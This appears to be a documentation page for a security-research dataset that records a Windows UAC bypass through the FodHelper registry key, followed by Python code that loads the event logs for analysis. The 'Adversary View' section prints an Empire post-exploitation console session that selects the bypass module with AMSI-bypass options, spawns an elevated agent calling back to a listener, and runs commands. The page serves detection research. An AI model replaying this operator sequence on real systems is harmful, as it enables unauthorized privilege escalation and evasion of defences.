Invoke BypassUAC FodHelper
Contents
Invoke BypassUAC FodHelper#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/09/04 |
Modification Date |
2020/09/04 |
Tactics |
|
Techniques |
|
Tags |
BypassUAC,Registry Modification,Windows Registry FodHelper |
Dataset Description#
This dataset represents adversaries elevating privileges (bypassing uac) by performing an registry modification for FodHelper.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
(Empire: SP7B3U2X) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
KU86XWEL ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5376 5/0.0 2020-09-04 07:07:17 http
SP7B3U2X ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 1376 5/0.0 2020-09-04 07:12:15 http
(Empire: agents) > interact SP7B3U2X
(Empire: SP7B3U2X) >
(Empire: SP7B3U2X) > usemodule privesc/bypassuac_fodhelper
(Empire: powershell/privesc/bypassuac_fodhelper) > info
Name: Invoke-FodHelperBypass
Module: powershell/privesc/bypassuac_fodhelper
NeedsAdmin: False
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: True
OutputExtension: None
Authors:
Petr Medonos
Description:
Bypasses UAC by performing an registry modification for
FodHelper (based
onhttps://winscripting.blog/2017/05/12/first-entry-welcome-
and-uac-bypass/)
Comments:
https://winscripting.blog/2017/05/12/first-entry-welcome-
and-uac-bypass/
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True SP7B3U2X Agent to run module on.
Listener True Listener to use.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http
(Empire: powershell/privesc/bypassuac_fodhelper) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked SP7B3U2X to run TASK_CMD_JOB
[*] Agent SP7B3U2X tasked with task ID 2
[*] Tasked agent SP7B3U2X to run module powershell/privesc/bypassuac_fodhelper
(Empire: powershell/privesc/bypassuac_fodhelper) >
Job started: EHNK23
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent F2X6GE4R checked in
[+] Initial agent F2X6GE4R from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to F2X6GE4R at 172.18.39.5
(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
KU86XWEL ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5376 5/0.0 2020-09-04 07:07:17 http
SP7B3U2X ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 1376 5/0.0 2020-09-04 07:30:33 http
F2X6GE4R ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 3936 5/0.0 2020-09-04 07:30:34 http
(Empire: agents) > interact F2X6GE4R
(Empire: F2X6GE4R) > shell whoami
[*] Tasked F2X6GE4R to run TASK_SHELL
[*] Agent F2X6GE4R tasked with task ID 1
(Empire: F2X6GE4R) >
theshire\pgustavo
..Command execution
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/empire_uac_shellapi_fodhelper.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)